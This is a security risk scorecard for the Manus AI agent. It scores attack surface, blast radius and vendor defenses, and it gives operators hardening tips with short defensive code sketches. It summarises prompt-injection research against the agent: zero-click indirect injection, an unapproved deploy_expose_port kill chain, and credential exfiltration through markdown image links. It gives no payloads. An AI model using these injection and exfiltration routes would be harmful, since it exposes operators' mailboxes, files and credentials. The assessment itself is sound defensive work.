1 Key Risks
The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Manus presents broad input and tool execution exposure with minimal vendor-implemented controls on the default configuration, placing the full hardening burden on the operator.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Manus, now operating at enterprise scale under Meta [10], carries a low composite score reflecting high capability with high exposure and minimal default defenses.
Manus lands in the Exposed Giants quadrant with Attack Surface at 7.36, Blast Radius at 8.50, and Defense Controls at 2.
The table below summarizes Attack Surface out of 10, Blast Radius out of 10, Defense Controls out of 15, and the composite AIRQ score.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 4.88 | Low composite reflects high exposure with minimal default defenses; input filtering is the highest-return operator action. |
| Blast Radius | 8.5 / 10 | Root shell, unrestricted networking, and OAuth-scoped credential access across multiple connected services dominate the blast profile. |
| Attack Surface | 7.36 / 10 | Four surfaces at adjusted ceiling driven by zero-click prompt injection and tool execution exploits with all three trifecta conditions met. |
| Defense Controls | 2 / 15 | Sandbox isolation and infrastructure monitoring are the only vendor-implemented controls on the default configuration. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The agent reasoning loop ingests untrusted content from web browsing, search results, uploaded documents, and OAuth-connected services as first-class input.
Higher scores indicate surfaces where independent research has demonstrated exploitation or where the vendor documents broad unrestricted access by default.
Each row maps one attack surface to a score out of five and a brief comment citing the evidence anchor for the assessment.
| Surface | Score | Comments |
|---|---|---|
| User Input | 5 / 5 | Accepts input from web, desktop, mobile, messaging, email, API, and MCP channels with no documented input validation; zero-click injection demonstrated [1][2]. |
| External Data | 5 / 5 | Ingests untrusted content from web pages, search results, documents, and MCP connector feeds with no content validation gate [1][8]. |
| Memory | 1 / 5 | Per-task sandbox provides session-level context only with no cross-session persistence or memory poisoning surface [7]. |
| Reasoning | 3 / 5 | Multi-agent architecture with Planner, Execution, and Verification agents provides partial reasoning transparency [5][7]. |
| Planning | 3 / 5 | Autonomous task decomposition with subagent delegation, background scheduling, and email-triggered automation [7]. |
| Tool Execution | 5 / 5 | Root-level shell, browser, code execution, and deploy_expose_port with no per-action approval; passwordless sudo escalation demonstrated [1][2]. |
| Orchestration | 3 / 5 | Multi-service orchestration via MCP connectors for Gmail, Notion, Stripe, Slack, and custom user-defined servers [8]. |
| Inter-Agent | 3 / 5 | Connects to external MCP server ecosystems including custom user-defined servers with OAuth but no inter-agent message integrity; connector-level authorization alone does not prevent cross-boundary abuse [3][8]. |
| Output Processing | 5 / 5 | Rich output with markdown image rendering and browser navigation with no DLP or exfiltration blocking; markdown image exfiltration demonstrated [2][9]. |
| Configuration | 2 / 5 | MCP connectors from vendor-managed registry with OAuth authorization; custom MCP servers require explicit user setup; undisclosed telemetry modules found embedded in generated code [4][8]. |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Manus ingests untrusted web content and connector data (untrusted_input), reads private mailbox and file-storage records via OAuth (sensitive_data), and transmits bytes outbound through unrestricted networking and markdown rendering (external_egress).
Manus exhibits all three of these conditions in its documented default configuration:
- Untrusted input — Browsed URLs, search engine results, fetched documents, and OAuth-connected service data all carry untrusted bytes into the agent reasoning loop [1][7].
- Sensitive data — OAuth-scoped MCP connectors read Gmail messages, Google Drive files, Notion pages, Stripe records, and GitHub repositories on behalf of the operator [8].
- External egress — Unrestricted outbound HTTP, deploy_expose_port, browser navigation, Gmail sending, Slack messaging, and markdown image fetching all transmit bytes outside the trust boundary [2][7].
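The three conditions above can be expressed as a simple session-level check. The following is a minimal sketch, not part of Manus or of the AIRQ methodology: the `SessionCapabilities` class and both function names are hypothetical, and only the field names `untrusted_input`, `sensitive_data`, and `external_egress` come from the report.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SessionCapabilities:
    """Hypothetical summary of what one agent session is able to do."""
    untrusted_input: bool   # processes web pages, search results, connector data
    sensitive_data: bool    # reads private mailbox or file-storage records
    external_egress: bool   # can send bytes outside the trust boundary


def trifecta_triggered(caps: SessionCapabilities) -> bool:
    """Return True only when all three conditions hold in the same session."""
    return caps.untrusted_input and caps.sensitive_data and caps.external_egress


def conditions_present(caps: SessionCapabilities) -> list[str]:
    """List the conditions that are present, to show which one to remove."""
    names = ("untrusted_input", "sensitive_data", "external_egress")
    return [name for name in names if getattr(caps, name)]


default_session = SessionCapabilities(True, True, True)
hardened_session = SessionCapabilities(True, True, False)
print(trifecta_triggered(default_session), trifecta_triggered(hardened_session))
```

Removing any single condition, for example by blocking egress for tasks that read connector data, is enough to make the check return False.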
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Manus sandbox reaches root-level code execution, unrestricted outbound networking, OAuth-scoped credentials, and public internet exposure via deploy_expose_port.
Higher blast scores indicate factors where the agent holds broad default authority or where independent research demonstrated active exploitation.
Each row ties one blast factor to its score out of four and the agent-specific evidence anchoring the assessment.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 4 / 4 | Root-level shell with passwordless sudo demonstrated within per-task cloud VM sandbox, enabling system-level command execution [1][7]. |
| File system access | 3 / 4 | Full read-write file system access within sandbox VM including system directories via root, in an ephemeral per-task environment [7]. |
| Network access | 4 / 4 | Unrestricted outbound networking from sandbox with no documented SSRF protection, plus deploy_expose_port for public internet exposure [2][7]. |
| Credential access | 3 / 4 | OAuth token access to Gmail, Google Drive, Stripe, HubSpot, GitHub, and other connected services via MCP connectors [8]. |
| Autonomous action | 3 / 4 | Autonomous operation with background tasks, scheduled tasks via Mail Manus, and no per-action approval within running tasks [7]. |
| Deployment access | 3 / 4 | deploy_expose_port directly exposes sandbox ports to the public internet, demonstrated in an independent prompt injection kill chain [2][7]. |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. The vendor publishes sandbox isolation and compliance certifications but leaves input filtering, action approval, and output sanitization as operator-managed on the default configuration.
Higher scores indicate stronger vendor-implemented safeguards; most components score zero, reflecting an operator-managed defense posture.
Each component is scored on vendor-implemented defaults from zero (nothing in place) to three (independently verified multi-layer control).
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 0 / 3 | No documented prompt shield, content filter, or injection detection on the default configuration; zero-click injection demonstrated [1][6]. |
| Execution Isolation | 1 / 3 | Per-task cloud VM sandbox provides process isolation between tasks but grants root access and unrestricted networking within each sandbox [7]. |
| Action Controls | 0 / 3 | No per-action approval gates for tool execution within tasks; deploy_expose_port and shell commands fire autonomously [2]. |
| Output Guardrails | 0 / 3 | No documented DLP, credential redaction, or exfiltration channel blocking; markdown image exfiltration confirmed by independent research [2]. |
| Monitoring | 1 / 3 | Infrastructure monitoring implied by SOC 2 Type 2 and ISO 27001; operators should enable the E-Discovery API and SIEM integration available for enterprise to gain per-action visibility [6][11]. |
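The headline Defense Controls figure is consistent with a plain sum of the five component scores in the table. The short check below assumes that simple summation; the report does not state the aggregation rule explicitly, so treat it as an illustration rather than the scoring method.

```python
# Component scores copied from the Defense Controls table.
DEFENSE_SCORES = {
    "Input Guardrails": 0,
    "Execution Isolation": 1,
    "Action Controls": 0,
    "Output Guardrails": 0,
    "Monitoring": 1,
}
MAX_PER_COMPONENT = 3  # each component is scored from zero to three

total = sum(DEFENSE_SCORES.values())
maximum = MAX_PER_COMPONENT * len(DEFENSE_SCORES)
print(f"Defense Controls: {total} / {maximum}")  # prints "Defense Controls: 2 / 15"
```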
6 Hardening Tips
Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize three actions in order: (1) input filtering to break the trifecta chain, (2) per-action approval gates for shell and deploy commands, (3) output sanitization to constrain blast radius.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy Require all external content ingested via MCP connectors and web browsing to pass through an approved prompt injection classifier before reaching the agent.
- Configuration Restrict the Mail Manus approved senders list to the minimum set of known internal addresses and disable email-triggered automation for sensitive workflows.
- Engineering Deploy a purpose-built prompt shield service with instruction hierarchy separation between the untrusted data pipeline and the Manus reasoning loop.
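As one illustration of the Configuration tip, an operator-side gateway could check the sender of an inbound message against an allowlist before the message is allowed to trigger a task. This is a minimal sketch under stated assumptions: the addresses and the `is_approved_sender` helper are hypothetical, and it does not use any Manus API. A From header can be spoofed, so a real deployment would also need to rely on authenticated mail results rather than the header alone.

```python
from email.utils import parseaddr

# Hypothetical allowlist of internal addresses permitted to trigger tasks.
APPROVED_SENDERS = frozenset({"ops@example.com", "secops@example.com"})


def is_approved_sender(from_header: str,
                       approved: frozenset = APPROVED_SENDERS) -> bool:
    """Return True only if the parsed address exactly matches an approved entry."""
    _display_name, address = parseaddr(from_header)
    # parseaddr returns an empty address for unparseable input, which never matches.
    return address.lower() in approved


print(is_approved_sender("Ops Team <ops@example.com>"))
print(is_approved_sender("Ops Team <ops@example.com.attacker.test>"))
```

Matching on the exact address, instead of a substring or domain suffix, avoids lookalike addresses slipping through.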
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy Mandate that all Manus tasks involving sensitive data run in sandboxes with non-root user accounts and restricted sudo access.
- Configuration Configure sandbox firewall rules to block outbound connections to non-allowlisted domains, constraining the unrestricted default networking.
- Engineering Implement microVM isolation (e.g., Firecracker) with capability dropping and seccomp profiles for the sandbox agent process; verify by attempting a container escape from a task.
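The domain allowlist in the Configuration tip can be sketched as a deny-by-default host check, of the kind an egress proxy in front of the sandbox might apply. The domains and the `egress_allowed` function are hypothetical; actual enforcement would live in firewall or proxy configuration, not in application code.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; subdomains of each entry are also permitted.
ALLOWED_DOMAINS = frozenset({"api.example.com", "example.org"})


def egress_allowed(url: str, allowed: frozenset = ALLOWED_DOMAINS) -> bool:
    """Allow a URL only if its host is an allowlisted domain or a subdomain of one."""
    try:
        host = (urlsplit(url).hostname or "").lower().rstrip(".")
    except ValueError:
        return False  # malformed URL, for example a broken IPv6 literal
    if not host:
        return False  # no host component, so deny by default
    return any(host == d or host.endswith("." + d) for d in allowed)


for candidate in ("https://api.example.com/v1",
                  "https://example.org.attacker.test/"):
    print(candidate, egress_allowed(candidate))
```

The suffix match includes the leading dot so that `example.org.attacker.test` is not mistaken for a subdomain of `example.org`.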
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy Require operator approval for high-impact tool invocations including deploy_expose_port, MCP connector write operations, and outbound messaging.
- Configuration Configure MCP connector integrations to use read-only OAuth scopes by default, requiring explicit elevation for write or send operations.
- Engineering Build a policy enforcement proxy between the agent and tool execution endpoints evaluating each call against a deny-by-default allowlist.
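The policy enforcement proxy in the Engineering tip can be sketched as a lookup table that denies anything not explicitly listed. Everything here is an assumption made for illustration: the `ToolCall` shape, the `Decision` values, and the policy entries are hypothetical and do not describe a Manus interface. Only the `deploy_expose_port` name comes from the report.

```python
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    REQUIRE_APPROVAL = "require_approval"
    DENY = "deny"


@dataclass(frozen=True)
class ToolCall:
    """Hypothetical representation of one tool invocation seen by the proxy."""
    tool: str
    action: str


# Hypothetical policy: reads pass, high-impact actions wait for an operator.
POLICY = {
    ("gmail", "read"): Decision.ALLOW,
    ("gmail", "send"): Decision.REQUIRE_APPROVAL,
    ("sandbox", "deploy_expose_port"): Decision.REQUIRE_APPROVAL,
}


def evaluate(call: ToolCall, policy: dict = POLICY) -> Decision:
    """Deny by default: any call missing from the policy is rejected."""
    return policy.get((call.tool, call.action), Decision.DENY)


print(evaluate(ToolCall("sandbox", "deploy_expose_port")).value)
print(evaluate(ToolCall("stripe", "refund")).value)
```

Keeping the default at `DENY` means a newly added connector or tool stays blocked until someone writes a rule for it.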
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy Block markdown image rendering from untrusted domains and disable automatic URL fetching in agent output to close demonstrated exfiltration channels.
- Configuration Configure output sanitization to strip embedded URLs, redirect chains, and active content from agent-generated markdown before delivery.
- Engineering Deploy a DLP gateway between the agent output pipeline and downstream consumers inspecting outbound content for credential patterns and PII.
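The markdown image channel named in the Policy tip can be narrowed by rewriting agent output before it is rendered. The sketch below assumes a hypothetical trusted host list and handles only inline `![alt](url)` images; reference-style images and raw HTML `<img>` tags would need separate handling, and relative URLs are removed because they carry no host.

```python
import re
from urllib.parse import urlsplit

# Hypothetical set of hosts that may serve images in rendered output.
TRUSTED_IMAGE_HOSTS = frozenset({"assets.example.com"})

# Inline markdown image: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_untrusted_images(markdown: str,
                           trusted: frozenset = TRUSTED_IMAGE_HOSTS) -> str:
    """Replace inline images whose host is not trusted with a text placeholder."""
    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:
            host = ""
        if host in trusted:
            return match.group(0)  # keep trusted images unchanged
        return f"[image removed: {alt}]"
    return IMAGE_PATTERN.sub(replace, markdown)


sample = ("Chart ![chart](https://assets.example.com/c.png) and "
          "![x](https://attacker.test/p.png?d=SECRET)")
print(strip_untrusted_images(sample))
```

Dropping the whole URL, query string included, matters because the exfiltrated data typically travels in the image request itself.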
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy Forward all Manus task logs to the organization SIEM and establish alerting on anomalous tool invocation patterns for deploy_expose_port and MCP writes.
- Configuration Enable the Manus E-Discovery API for compliance workflows and configure retention policies covering all task inputs, outputs, and tool records.
- Engineering Instrument the sandbox environment with behavioral anomaly detection flagging unexpected shell sequences, network patterns, and privilege escalation attempts.
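The alerting described in the Policy tip can be prototyped as a pass over forwarded tool records. The record fields (`task_id`, `tool`, `is_mcp_write`) and the write threshold are hypothetical; the actual log schema exposed by the vendor is not described in this report, so a real rule would need to be adapted to it.

```python
from collections import Counter

# Tool named in the report as high impact; extend as needed.
HIGH_RISK_TOOLS = frozenset({"deploy_expose_port"})


def find_alerts(records: list[dict], max_writes_per_task: int = 5) -> list[str]:
    """Flag every high-risk tool call and any task exceeding the MCP write limit."""
    alerts: list[str] = []
    writes: Counter = Counter()
    for record in records:
        task = record["task_id"]
        if record["tool"] in HIGH_RISK_TOOLS:
            alerts.append(f"{task}: high-risk tool {record['tool']}")
        if record.get("is_mcp_write", False):
            writes[task] += 1
            # Alert once, at the moment the limit is first exceeded.
            if writes[task] == max_writes_per_task + 1:
                alerts.append(f"{task}: more than {max_writes_per_task} MCP writes")
    return alerts


sample_records = [
    {"task_id": "t1", "tool": "gmail.send", "is_mcp_write": True},
    {"task_id": "t1", "tool": "gmail.send", "is_mcp_write": True},
    {"task_id": "t1", "tool": "gmail.send", "is_mcp_write": True},
    {"task_id": "t2", "tool": "deploy_expose_port"},
]
for alert in find_alerts(sample_records, max_writes_per_task=2):
    print(alert)
```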
7 References
The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [2][7]) refer to entries below, listed in citation order.
Selected Vulnerabilities
- [1] SilentBridge zero-click agent takeover (Aurascape AuraLabs): three zero-click indirect prompt injection variants against Meta Manus, each rated CVSS 9.8, with root sandbox compromise and Gmail exfiltration
- [2] Prompt injection exposes Manus VS Code Server (Johann Rehberger): end-to-end indirect prompt injection kill chain invoking deploy_expose_port without approval and exfiltrating credentials via markdown images
Selected Research
- [3] SilentBridge connector authorization analysis (DeepInspect): control-plane and data-plane separation failure, cross-tenant IDOR on the CDN, and insufficiency of connector-level OAuth
- [4] Manus AI hidden telemetry investigation (independent investigation): undisclosed analytics injection and network interception modules embedded in Manus-generated code
- [5] Manus AI technical architecture analysis (arXiv): multi-agent architecture analysis covering the Planner, Execution, and Verification agent design and the sandbox environment
Vendor Documentation
- [6] Manus security and compliance page (vendor): SOC 2 Type 1 and Type 2, ISO 27001:2022, and ISO 27701:2019 certifications, plus infrastructure and product security features
- [7] Manus Sandbox architecture (vendor): per-task isolated cloud VM sandbox built on a Zero Trust principle, with root access by design and unrestricted operations
- [8] Manus MCP Connectors (vendor): prebuilt MCP integrations for Gmail, Notion, Stripe, HubSpot, Slack, Google Calendar, and GitHub with OAuth 2.0
- [9] Manus Cloud Browser (vendor): isolated cloud browser instances with encrypted sessions and a Take Over mechanism for authentication challenges
Other Sources
- [10] Meta acquires Manus AI agent firm (CNBC): Meta's acquisition of Manus, integration plans, and platform scale of 147 trillion tokens processed
- [11] Manus Compliance APIs (vendor): E-Discovery API and SIEM integration capabilities for regulated enterprise compliance workflows